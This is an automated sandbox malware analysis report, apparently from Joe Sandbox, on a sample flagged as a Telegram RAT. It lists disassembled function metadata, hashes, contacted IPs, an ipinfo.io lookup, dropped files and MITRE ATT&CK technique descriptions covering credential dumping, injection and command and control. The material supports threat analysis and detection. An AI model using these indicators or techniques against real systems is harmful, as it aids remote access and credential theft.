
getaddrinfo.WS2_32 ref: 00007FFD3FCA6B7E
getaddrinfo.WS2_32 ref: 00007FFD3FCA6BBF

Strings

..\s\crypto\bio\b_addr.c, xrefs: 00007FFD3FCA6BEC, 00007FFD3FCA6C33, 00007FFD3FCA6C5F

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: getaddrinfo
String ID: ..\s\crypto\bio\b_addr.c
API String ID: 300660673-2547254400
Opcode ID: 235723b66d282f098a6fbed6f894c7b970b2fa5fbfaa8cc020faa70d78bfa678
Instruction ID: 722216ce105fcd2af3090c1da1ee4e229c497024b006cc40992dadef001b22aa
Opcode Fuzzy Hash: 235723b66d282f098a6fbed6f894c7b970b2fa5fbfaa8cc020faa70d78bfa678
Instruction Fuzzy Hash: 8741B873B1868A87EB589F16B4906BDB7A1FB94784F004135EB8A43B85DF3CE445BB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE3387 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FFD3FCAA1A7
WSAGetLastError.WS2_32 ref: 00007FFD3FCAA1B2

Strings

..\s\crypto\bio\b_sock.c, xrefs: 00007FFD3FCAA166, 00007FFD3FCAA1C8, 00007FFD3FCAA1E4, 00007FFD3FCAA217

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLastgetsockname
String ID: ..\s\crypto\bio\b_sock.c
API String ID: 566540725-540685895
Opcode ID: e1c81a765875b987af6ce7381e9c39fea55679f384358aa352923a1f1ce32b8d
Instruction ID: 3bfb88c5979ec1666a3f0783bc7d2ac897cf31a6502ec2b58e5a217044956d6f
Opcode Fuzzy Hash: e1c81a765875b987af6ce7381e9c39fea55679f384358aa352923a1f1ce32b8d
Instruction Fuzzy Hash: 232190B6B0814AD6E725DB20E8656ED7360FF80304F840231E76C43A95DF3DE589EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE6BEA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFD3FCAA362
WSAGetLastError.WS2_32 ref: 00007FFD3FCAA36E

Strings

..\s\crypto\bio\b_sock.c, xrefs: 00007FFD3FCAA384

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLastioctlsocket
String ID: ..\s\crypto\bio\b_sock.c
API String ID: 1021210092-540685895
Opcode ID: 60a1ab62464ec2a0ac3dda5e3f28e7a2988a3f697a3705fb2a2132065268ab70
Instruction ID: 581d40725691655526b4c6309f48319c5746a3baf1354b6beb656b4e82ebd8fc
Opcode Fuzzy Hash: 60a1ab62464ec2a0ac3dda5e3f28e7a2988a3f697a3705fb2a2132065268ab70
Instruction Fuzzy Hash: 92E0D895B0954B87F71A5B60E874B7D1310AF84304F000134EF1DC2691DF3DF149A601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FE1B190 Relevance: 5.2, APIs: 4, Instructions: 239COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B2CB
memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B313
memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B32D

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: e221e4df5d2fb403f53de0e259801b9ae333423dbc6769aefdf0bcf9ba463014
Instruction ID: 5dcb10c62d986749a5643e8c892569aefbdb855d31880017d62f8cbbf9d2875b
Opcode Fuzzy Hash: e221e4df5d2fb403f53de0e259801b9ae333423dbc6769aefdf0bcf9ba463014
Instruction Fuzzy Hash: FB910861B0868982EB189B17D4A017DA7A0FBC9FC4F588035DF8D93B96CE3EE855D700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE53E4 Relevance: 5.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFD3FCD9950
memmove.VCRUNTIME140 ref: 00007FFD3FCD9960
memmove.VCRUNTIME140 ref: 00007FFD3FCD9970
memmove.VCRUNTIME140 ref: 00007FFD3FCD9980

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 76854a5fe0e60425e535bb1bcb9eac985b2d474becd93fe018a8b42bb91e7afe
Instruction ID: 7806a3e2b7fff18afe6bea40b5bd3edb473fd01d1bbea04dea83d53fcd418057
Opcode Fuzzy Hash: 76854a5fe0e60425e535bb1bcb9eac985b2d474becd93fe018a8b42bb91e7afe
Instruction Fuzzy Hash: 4A11BF62B04A8592D714EB1AE1901EDA360FF847D0F448132FB9E87B96EF28E5E1D300

Uniqueness

Uniqueness Score: -1.00%

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	DNS query: name: ipinfo.io
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	DNS query: name: ipinfo.io

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_asyncio.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_bz2.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_ctypes.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_decimal.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_elementtree.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_hashlib.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_lzma.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_msi.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_multiprocessing.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_overlapped.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_queue.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_socket.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_sqlite3.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_ssl.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_tkinter.pyd

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_uuid.pyd

Windows Analysis Report
file.exe

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre